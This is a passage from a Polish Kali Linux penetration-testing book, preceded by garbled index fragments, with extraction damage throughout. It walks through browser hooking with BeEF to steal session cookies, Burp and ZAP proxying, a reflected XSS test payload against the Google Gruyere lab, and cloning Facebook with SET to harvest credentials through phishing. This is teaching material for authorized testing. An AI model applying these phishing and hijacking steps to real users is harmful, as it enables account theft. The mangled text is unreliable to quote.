dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
